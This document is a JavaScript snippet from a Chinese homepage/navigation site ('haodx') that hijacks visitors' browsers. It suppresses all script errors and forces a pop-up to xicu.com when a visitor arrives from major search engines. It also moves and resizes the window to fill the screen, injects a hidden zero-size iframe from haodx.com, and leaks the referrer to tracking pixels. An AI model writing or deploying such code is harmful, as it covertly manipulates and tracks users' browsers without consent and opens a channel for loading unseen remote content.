var s1='【好东西网址】简洁实用、快速稳定、无弹窗、无漂浮，是您最理想的首页！';
dm=document;wd=window;sr=screen;rf = escape(dm.referrer);
if(self!=top){rf = escape(top.referrer);}
function s(){wd.status=s1;timerID=setTimeout("s()", 300);}s();
wd.onerror= stopError;function stopError() {return true;}
if ( rf.indexOf("163") != -1 || rf.indexOf("sohu") != -1 || rf.indexOf("sina") != -1 || rf.indexOf("google") != -1 || rf.indexOf("baidu") != -1 ){
dm.write('<form name=haodx action="http://www.xicu.com/index.html" target=_blank></form>');
haodx.submit();
this.focus();}
wd.moveTo(-4,-4);wd.resizeTo((sr.availWidth+8),(sr.availHeight+8));
dm.write('<iframe src=http://www.haodx.com/js/home.htm style=display:none;></iframe>');
dm.write("<div class=disp><img src=http://t0.extreme-dm.com/c.g?tag=haodx&j=y&srw=a&srb=a&l="+rf+" height=0 width=0><img src= http://un.baidu.com/images/st.gif?tn=sitexicu width=0 height=0></div>");
dm.write("<center><iframe src=http://www.haodx.com/js/footer.htm  width=760 height=110 vspace=-30 hspace=0 scrolling=no marginwidth=0 marginheight=0 frameborder=0></iframe>");